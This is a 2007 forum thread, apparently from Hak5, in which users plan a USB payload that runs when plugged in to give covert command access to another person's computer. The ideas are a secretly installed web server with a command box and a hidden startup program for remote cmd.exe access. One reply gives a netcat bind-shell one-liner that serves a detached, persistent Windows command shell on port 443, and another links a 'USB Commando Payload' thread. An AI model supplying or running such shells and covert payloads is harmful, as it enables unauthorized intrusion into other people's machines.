Xqtftqx Posted November 28, 2007 Share Posted November 28, 2007 Ok, im working on a little hack, when you plug in your USB drive it exicutes some code which then you can return to your computer and gain acsess to there Command Prompt, or at least exicute some commands. I have 2 ideas so far Number 1, Secretly install Apache and PHP (Or something like wamp) then have a code with a textbox, php include, and the system command you enter the text in the text box then it will run the command with a ">> output.txt" on it then php inlcude includes that file Number 2, this one adds a program that runs on startup which allows remote acsess to cmd.exe Quote Link to comment Share on other sites More sharing options...
SomeoneE1se Posted November 28, 2007 Share Posted November 28, 2007 and how do you get the php code to run? Quote Link to comment Share on other sites More sharing options...
Xqtftqx Posted November 28, 2007 Author Share Posted November 28, 2007 hmmm, lol didnt think about that well thats out Quote Link to comment Share on other sites More sharing options...
beakmyn Posted November 30, 2007 Share Posted November 30, 2007 nc -l -p443 -d -e cmd.exe –L nc is netcat Quote Link to comment Share on other sites More sharing options...
sablefoxx Posted December 1, 2007 Share Posted December 1, 2007 Been sitting on this for a while, but i guess i'll share: http://forums.hak5.org/index.php/topic,7991.0.html Started a thred under "USB Commando Payload", enjoy. (doesnt do the php/apache only nc.exe) Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.